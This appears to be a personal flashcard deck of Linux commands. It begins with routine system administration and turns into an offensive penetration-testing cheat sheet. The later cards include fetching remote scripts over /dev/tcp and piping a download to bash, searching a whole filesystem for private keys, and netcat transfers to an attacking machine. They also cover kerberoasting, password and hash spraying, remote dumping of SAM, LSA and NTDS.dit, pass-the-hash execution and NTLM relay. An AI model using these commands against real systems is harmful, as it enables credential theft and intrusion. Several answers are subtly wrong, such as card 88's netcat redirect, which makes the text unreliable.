Useful Linux Commands Flashcards
You must know all of these 100%
1
Q
Show system information
A
uname -a
2
Q
Display memory usage
A
free -h
3
Q
Show disk space usage
A
df -h
4
Q
Show disk usage per directory
A
du -sh [directory]
5
Q
Show running processes
A
ps aux
6
Q
Show real-time system resource usage
A
top
7
Q
Interactive system monitoring tool
A
htop
8
Q
Show system uptime and load average
A
uptime
9
Q
Display last system boot time
A
who -b
10
Q
Show currently logged-in users
A
who
11
Q
Show last login history
A
last
12
Q
Check system logs
A
journalctl -xe
13
Q
Show kernel logs
A
dmesg
14
Q
Display open network connections
A
netstat -tulnp
15
Q
Display listening ports
A
ss -tulnp
16
Q
Display current network interfaces and IP addresses
A
ip a
17
Q
Restart a service
A
systemctl restart [service]
18
Q
Stop a service
A
systemctl stop <service></service>
19
Q
Start a service
A
systemctl start [service]
20
Q
Enable a service to start on boot
A
systemctl enable [service]
21
Q
Disable a service from starting on boot
A
systemctl disable [service]
22
Q
Check service status
A
systemctl status [service]
23
Q
List all active services
A
systemctl list-units –type=service
24
Q
Show disk partitions
A
lsblk
25
Show detailed partition information
fdisk -l
26
Mount a filesystem
mount [device] [mount_point]
27
Unmount a filesystem
umount
28
Check disk health (SMART)
smartctl -a /dev/sdX
29
Create a new user
useradd -m [username]
30
Delete a user
userdel -r [username]
31
Change user password
passwd [username]
32
Add a user to a group
usermod -aG [groupname] [username]
33
Show group memberships for a user
groups [username]
34
Show system resource limits
ulimit -a
35
Monitor real-time system logs
tail -f /var/log/syslog
36
Shut down the system immediately
shutdown -h now
37
Reboot the system
reboot
38
Securely delete a file
shred -u [file_name]
39
List files in a directory
ls -lah
40
Change directory
cd [directory]
41
Create a new directory
mkdir [directory]
42
Remove an empty directory
rmdir [directory]
43
Remove a directory and its contents
rm -rf [directory]
44
Copy a file
cp [source] [destination]
45
Move or rename a file
mv [source] [destination]
46
Create a new empty file
touch
47
View file contents
cat [file_name]
48
Display file contents with pagination
less
49
Show the first 10 lines of a file
head <[file_name]
50
Show the last 10 lines of a file
tail
51
Find files by name
find /path/to/search -name "[file_name]"
52
Find files larger than 1GB
find / -size +1G
53
Search for a string inside files
grep "pattern" [file]
54
Search recursively in directories
grep -r "pattern" /path/to/directory
55
Show file type
file [file_name]
56
Change file permissions
chmod 755 [file_name]
57
Change file ownership
chown user:group [file_name]
58
Compress a file with gzip
gzip [file_name]
59
Decompress a gzip file
gunzip [file_name.gz]
60
Compress a file with bzip2
bzip2 [file_name]
61
Decompress a bzip2 file
bunzip2 [bzip file]
62
Create a tar archive
tar -cvf archive.tar [directory]
63
Extract a tar archive
tar -xvf archive.tar
64
Create a compressed tar.gz archive
tar -czvf archive.tar.gz [directory]
65
Extract a tar.gz archive
tar -xzvf archive.tar.gz
66
Create a compressed tar.bz2 archive
tar -cjvf archive.tar.bz2 [directory]
67
Extract a tar.bz2 archive
tar -xjvf archive.tar.bz2
68
How to use scp?
scp [user]@[remote ip]:/path/to/file
69
How to add something to $PATH?
export PATH="[new path to add]:$PATH"
70
How to port forward SSH
ssh -L [lport]:[lhost]:[rport] [user]@[rhost]
71
How to search for ssh keys on a system
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
72
How to manually make http request
exec 3<>/dev/tcp/[ip]/[port]
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
cat <&3
73
How to make a python https upload server which takes POST
python3 -m virtualenv . && sudo python3 -m pip install --user uploadserver && openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' && sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
74
How to start an SSH server
useradd -m [username]
sudo systemctl enable sshd
75
How to start a python3 http server?
python3 -m http.server
76
How to start a python2 http server?
python2.7 -m SimpleHTTPServer
77
How to start a PHP http server?
php -S 0.0.0.0:8000
78
How to start a ruby http server?
ruby -run -ehttpd . -p8000
79
How to GET with http python2
python2.7 -c 'import urllib;urllib.urlretrieve ([url])'
80
How to GET with http python3
python3 -c 'import urllib.request;urllib.request.urlretrieve([url],[out file name]")'
81
How to POST with http python3
python3 -c 'import requests;requests.post("http://:8000/upload",files={"files":open(,"rb")})'
82
How to start a python3 http upload server?
python3 -m virtualenv . && python3 -m uploadserver
83
How to GET with http PHP?
php -r '$file = file_get_contents([url]); file_put_contents([outfile name],$file);'
84
How to GET with PHP fopen()?
php -r 'const BUFFER = 1024; $fremote =
fopen([url], "rb"); $flocal = fopen([out file name], "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
85
How to do fileless download PHP?
php -r '$lines = @file([url]); foreach ($lines as $line_num => $line) { echo $line; }' | bash
86
How to GET with http ruby?
ruby -e 'require "net/http"; File.write([outfile name], Net::HTTP.get(URI.parse([url])))'
87
How to GET with http perl?
perl -e 'use LWP::Simple; getstore([url], [outfile name]);'
88
How to upload file with netcat?
cat [file] > nc [ip] [port]
89
How to download file with netcat?
nc -nvlp [port] > [out_file]
90
How to upload file with ncat?
ncat --send-only [target ip] 8000 < file-to-transfer.txt
91
How to upload
To create a certificate on a target machine:
`openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem`
run this on attacking machine:
`openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh`
Download the file from target machine:
`openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh`
92
How to start a python3 ftp server for downloading?
python3 -m virtualenv . && sudo pip3 install pyftpdlib && sudo python3 -m pyftpdlib --port 21
93
How to start a python3 ftp server for uploading?
python3 -m virtualenv . && sudo pip3 install pyftpdlib && sudo python3 -m pyftpdlib --port 21 --write
94
How to mount a filesystem with rdp rdesktop?
rdesktop [hostname] -d [domain] -u [user] -p [pass] -r disk:linux=[path]
95
How to mount a filesystem with rdp xfreerdp?
xfreerdp /v:[hostname] /d:[domain] /u:[user] /p:[pass] /drive:linux,[path]
96
How to start rlogin session?
rlogin [ip] -l [user]
97
How to pull all files in an rsync share?
rsync -av rsync://[hostname]/[share]
98
How to list contents of an rsync share?
rsync -av --list-only rsync://[hostname]/[share]
99
How to connect to oracledb service?
sqlplus [user]/[pass]@[oracledb server ip]/[sid]
100
How to connect to an ftp server?
ftp [user]@[ip] [port]
101
How to connect to an ftp server in passive mode?
ftp [user]@[ip] [port] -p
102
How to mount an NFS share?
sudo mkdir /mnt/target-NFS && sudo mount -t nfs [ip]:/ /mnt/target-NFS/ -o nolock
103
How to unmount an NFS share?
cd /mnt && sudo umount ./target-NFS
104
How to connect to an SMTP server?
telnet [ip] 25
105
How to login to SMTP from commandline?
AUTH LOGIN
give base64 encoded creds
106
How to compose an email via command line?
MAIL FROM:[emai;]
RCPT TO:[email]
DATA
Subject: [subject]
From: [email]
To: [email]
body of email
.
107
How to log out from SMTP server?
QUIT
108
How to connect to mysql?
mysql -u [user] -h [ip] -p [pass]
109
How to check domain info for linux domain joined host?
realm list
110
How to kerberoast with impacket
GetUserSPNs.py [Domain/Username:password] -dc-ip [dc_ip] -request
111
How to kerberoast on domain joined machine rubeus?
Rubeus.exe kerberoast
112
How to check if smbexec is enabled with smbmap?
smbmap -H $ip -u [username] -p [password] -x “whoami”
113
how to map an smb share with smbmap?
smbmap -H [ip] -u [username] -p [password] -r [share name]
114
How to spray passwords for AD users?
nxc smb [host] -u [wordlist of users] -p [password wordlist] --continue-on-success
115
How to spray hashes for AD users?
nxc smb [host] -u [wordlist of users] -H [hash list] --continue-on-success
116
How to check if smb exec is enabled with nxc?
nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami
117
How to check if smb exec is enabled with nxc and execute command with local admin?
nxc smb [ip] -u [user] -d [doamin] -p [pass] -x whoami —local-auth
118
How to enumerate smb shares with nxc?
crackmapexec smb [ip] -u [user] -p [pass] --shares
119
How to enumerate domain users with rid brute?
nxc smb $ip -u [user] -p [pass] --rid-brute
120
How to remotely dump lsa?
crackmapexec smb [ip] --local-auth -u 'admin' -p [pass] --lsa
121
How to remotely dump SAM?
crackmapexec smb [ip] --local-auth -u 'admin' -p [pass] --sam
122
How to remotely dump NTDS.dit
crackmapexec smb [ip] -u [user] -p [pass] --ntds
123
How to remotely execute commands with wmi?
wmiexec.py [user]:[pass]@[ip] [command]
124
How to remotely execute commands with wmi by passing a hash?
python3 wmiexec.py [user]:[pass]@[ip] -hashes [hash] [command]
125
How to psexec remotely?
python3 psexec.py [user]:[pass]@[ip] [command]
126
How to find AS-REP roastable users?
ldapdomaindump -u '[doamin]\[user]' -p [pass] [ip]
127
How to AS-REP roast with user list?
python3 GetNPUsers.py -dc-ip [ip] [domain]/ -usersfile users.txt
128
How to crack AS-REP roast hashes?
hashcat -m 18200 [hashes] [wordlist] --force
129
How to set up an NTLM relay smb server? 1
python3 ntlmrelayx.py -smb2support -o hashfile
130
How to set up an NTLM relay smb server? 2
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp
131
How to enumerate AD Users using smb exec?
python3 GetADUsers.py [domain]/[user]:[pass] -dc-ip [ip]
132
How to enumerate AD Users using smb exec by passing the hash?
python3 GetADUsers.py [domain]/[user]@[ip] -hashes [hash]
133
How to mount an smb share
sudo mount -t cifs -o username=plaintext,password=[pass],domain=. //[ip]/[share] /mnt/share
134
How to mount an smb share with a credential file
mount -t cifs //[ip]/[share] /mnt/share -o credentials=/path/credentialfile
135
How to connect to an MSSQL database remotely?
sqsh -S [ip] -U [user] -P [pass]
136
How to restart apache?
sudo systemctl restart apache2
137
How to use php filter to include a php file
php://filter/read=convert.base64-encode/resource=/index/php
138
How to use data wrapper php
?file=data://text/plain;base64,
139
How to use input wrapper php
file=input://, payload in body
140
How to use zip wrapper php
file=zip://path/to/zip#path/to/file
141
